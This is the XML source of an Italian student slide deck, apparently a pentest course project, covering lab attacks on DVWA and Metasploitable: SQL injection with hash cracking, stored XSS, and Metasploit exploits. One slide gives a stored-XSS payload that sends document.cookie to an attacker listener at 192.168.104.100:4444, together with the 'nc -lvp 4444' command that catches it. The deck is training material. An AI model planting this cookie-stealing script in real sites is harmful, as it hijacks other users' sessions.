                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>L’obiettivo è rubare i cookies di sessione di qualunque utente che accede alla DVWA WEB APP tramite la tecnica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b="1" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>XSS persistente</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="3200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs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5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3F7C-046D-9FA6-66E8-0DA1A258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853372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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="3100" dirty="0"/>
              <a:t>P</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT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rima assicuriamoci che la vittima è raggiungibile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C99D1C-569F-D785-686E-03BA0142B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847713"/>
            <a:ext cx="7608304" cy="3233529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BDC4B-96D4-AE2C-B7D7-E8C0D2B5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2- Eseguire l’attacco XSS persistente sulla web app della DVWA</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4800" dirty="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6B105-C8BC-3C96-E899-EB2029A2D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7" y="2874037"/>
            <a:ext cx="6955923" cy="3467584"/>
          </a:xfr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CFFDF65-18B3-F1E2-FCE5-697E130DCF1E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7763631" y="3119337"/>
            <a:ext cx="4254257" cy="1531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/>
              <a:t>Usando lo script </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" b="1" dirty="0"/>
              <a:t>&lt;script&gt;new Image().</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" b="1" dirty="0" err="1"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" b="1" dirty="0"/>
              <a:t>="http://192.168.104.100:4444?"+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" b="1" dirty="0" err="1"/>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" b="1" dirty="0"/>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" b="1" dirty="0"/>
              <a:t>&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT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99E34-E000-9740-EAC6-FF66A3B2387F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6263014" y="4584526"/>
            <a:ext cx="876822" cy="1377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EB81CE-0EDE-55C5-D4B2-1B0B4CF18282}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7850686" y="5022939"/>
            <a:ext cx="4254257" cy="604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1800" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" dirty="0"/>
              <a:t>Dobbiamo prima cambiare la lunghezza massima del messaggio </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17056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02540-2047-DA34-FF52-6E969BB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 Avviare il servizio di netcat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96146A-B2D1-6F75-E797-E3121046BE70}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="808638" y="4758202"/>
            <a:ext cx="8868498" cy="1401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  <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Usando il commando </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" b="1" i="1" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" b="1" i="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" b="1" i="1" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>lvp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" b="1" i="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> 4444</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> per metterci in ascolto su porta </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" b="1" i="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>4444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  <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Quando la vittima apre la pagina di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> intercetta subito la sessione mostrando , varie informazione come, PHPSESSID e il browser in uso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4E38F-EC3B-4634-51E2-26A65A05C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2" y="2507314"/>
            <a:ext cx="8709167" cy="204665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23531-2553-1667-CBBB-46D4F7D99880}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="286612" y="2899880"/>
            <a:ext cx="7027039" cy="1551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455BFA-1144-D969-774F-DCAF2B22336E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2467627" y="3244241"/>
            <a:ext cx="3244241" cy="18475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509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Calibri-Italic</vt:lpstr>
      <vt:lpstr>Tahoma</vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>Build week 2</vt:lpstr>
      <vt:lpstr>L’obiettivo è attaccare la WEB APP della DVWA per recuperare la password in chiaro dell’utente Pablo Picasso tramite la tecnica SQL injection. </vt:lpstr>
      <vt:lpstr>1- Dobbiamo prima assicurarci che la vittima è raggiungibile</vt:lpstr>
      <vt:lpstr>2- Eseguire l’attacco SQLi sulla web app della DVWA</vt:lpstr>
      <vt:lpstr>3- Decifrare l’hash md5 </vt:lpstr>
      <vt:lpstr>L’obiettivo è rubare i cookies di sessione di qualunque utente che accede alla DVWA WEB APP tramite la tecnica  XSS persistente.</vt:lpstr>
      <vt:lpstr>1- Prima assicuriamoci che la vittima è raggiungibile</vt:lpstr>
      <vt:lpstr>2- Eseguire l’attacco XSS persistente sulla web app della DVWA</vt:lpstr>
      <vt:lpstr>3- Avviare il servizio di netcat</vt:lpstr>
      <vt:lpstr>Exploit Metasploitable usando Metasploit</vt:lpstr>
      <vt:lpstr>1- Assicuriamoci che la vittima è raggiungibile</vt:lpstr>
      <vt:lpstr>2- Valutazione delle vulnerabilità</vt:lpstr>
      <vt:lpstr>Usando il tool msfconsole cerchiamo l’exploit relativo a quella vulnerabilità</vt:lpstr>
      <vt:lpstr>Presentazione standard di PowerPoint</vt:lpstr>
      <vt:lpstr>Una volta ottenuto il controllo della macchina vittima, eseguiamo il comando ifconfig per vedere se effettivamente siamo dentro.</vt:lpstr>
      <vt:lpstr>Lo scopo di questo attacco è sfruttare la vulnerabilità di windows XP usando Metasploit.</vt:lpstr>
      <vt:lpstr>1- Come sempre assicuriamoci che la vittima è raggiungibile</vt:lpstr>
      <vt:lpstr>2- Valutazione delle vulnerabilità</vt:lpstr>
      <vt:lpstr>3- La fase di exploit</vt:lpstr>
      <vt:lpstr>Abbiamo cambiato le opzioni dell’exploit e del suo payload, impostando l’host remoto e la porta in ascolto locale.</vt:lpstr>
      <vt:lpstr>4- Lanciando l’exploit siamo riusciti ad ottenere una sessione aperta con la vittima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week 2</dc:title>
  <dc:creator>Islam Khalil</dc:creator>
  <cp:lastModifiedBy>Simone Cannizzaro</cp:lastModifiedBy>
  <cp:revision>10</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-09-05T08:51:54Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-09-13T08:15:57Z</dcterms:modified>
</cp:coreProperties>
</file>